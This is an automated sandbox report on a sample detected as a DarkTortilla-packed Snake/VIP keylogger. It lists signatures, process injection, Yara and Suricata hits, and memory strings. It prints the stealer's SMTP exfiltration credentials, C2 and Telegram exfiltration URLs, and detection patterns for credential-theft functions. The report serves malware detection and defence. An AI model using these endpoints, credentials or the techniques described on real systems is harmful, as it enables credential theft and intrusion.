Edit tour

Windows Analysis Report
5qJ6QQTcRS.exe

Overview

General Information

Sample name:	5qJ6QQTcRS.exe renamed because original name is a hash value
Original sample name:	e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c.exe
Analysis ID:	1588845
MD5:	78668d52e5b092184a4b8e6788713b3c
SHA1:	302e6b4b4f6441acbbfe4e55c6f6d8a83d94f7eb
SHA256:	e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c
Tags:	exeuser-adrian__luca
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

5qJ6QQTcRS.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\5qJ6QQTcRS.exe" MD5: 78668D52E5B092184A4B8E6788713B3C)

InstallUtil.exe (PID: 8132 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dff0:$a1: get_encryptedPassword 0x2e578:$a2: get_encryptedUsername 0x2dc63:$a3: get_timePasswordChanged 0x2dd7a:$a4: get_passwordField 0x2e006:$a5: set_encryptedPassword 0x30d22:$a6: get_passwords 0x310b6:$a7: get_logins 0x30d0e:$a8: GetOutlookPasswords 0x306c7:$a9: StartKeylogger 0x3100f:$a10: KeyLoggerEventArgs 0x30767:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e370:$a1: get_encryptedPassword 0x2e8f8:$a2: get_encryptedUsername 0x2dfe3:$a3: get_timePasswordChanged 0x2e0fa:$a4: get_passwordField 0x2e386:$a5: set_encryptedPassword 0x310a2:$a6: get_passwords 0x31436:$a7: get_logins 0x3108e:$a8: GetOutlookPasswords 0x30a47:$a9: StartKeylogger 0x3138f:$a10: KeyLoggerEventArgs 0x30ae7:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1965003803.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 5qJ6QQTcRS.exe PID: 8140	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x27588:$a1: get_encryptedPassword 0x62503:$a1: get_encryptedPassword 0x27b06:$a2: get_encryptedUsername 0x62a81:$a2: get_encryptedUsername 0x2720a:$a3: get_timePasswordChanged 0x62185:$a3: get_timePasswordChanged 0x27321:$a4: get_passwordField 0x6229c:$a4: get_passwordField 0x2759e:$a5: set_encryptedPassword 0x62519:$a5: set_encryptedPassword 0x2a262:$a6: get_passwords 0x651dd:$a6: get_passwords 0x2a5f2:$a7: get_logins 0x6556d:$a7: get_logins 0x2a24e:$a8: GetOutlookPasswords 0x651c9:$a8: GetOutlookPasswords 0x29c07:$a9: StartKeylogger 0x64b82:$a9: StartKeylogger 0x2a54b:$a10: KeyLoggerEventArgs 0x654c6:$a10: KeyLoggerEventArgs 0x29ca7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 8132	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8132	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 8132	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 8132	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1695a7:$a1: get_encryptedPassword 0x169b25:$a2: get_encryptedUsername 0x169229:$a3: get_timePasswordChanged 0x169340:$a4: get_passwordField 0x1695bd:$a5: set_encryptedPassword 0x16c281:$a6: get_passwords 0x16c611:$a7: get_logins 0x16c26d:$a8: GetOutlookPasswords 0x16bc26:$a9: StartKeylogger 0x16c56a:$a10: KeyLoggerEventArgs 0x16bcc6:$a11: KeyLoggerEventArgsEventHandler
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.5qJ6QQTcRS.exe.3b01960.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.3ab6d70.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.5b60000.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.5b60000.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.3b01960.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.3ab6d70.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
4.2.InstallUtil.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
4.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
Click to see the 21 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:14:35.817329+0100	2803305	3	Unknown Traffic	192.168.2.10	49982	104.21.112.1	443	TCP
2025-01-11T06:14:38.214770+0100	2803305	3	Unknown Traffic	192.168.2.10	49986	104.21.112.1	443	TCP
2025-01-11T06:14:40.599478+0100	2803305	3	Unknown Traffic	192.168.2.10	49990	104.21.112.1	443	TCP
2025-01-11T06:14:41.832235+0100	2803305	3	Unknown Traffic	192.168.2.10	49992	104.21.112.1	443	TCP
2025-01-11T06:14:44.289038+0100	2803305	3	Unknown Traffic	192.168.2.10	49996	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:14:34.400712+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49980	158.101.44.242	80	TCP
2025-01-11T06:14:35.291474+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49980	158.101.44.242	80	TCP
2025-01-11T06:14:36.463329+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49983	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:14:45.212528+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49997	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:14:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
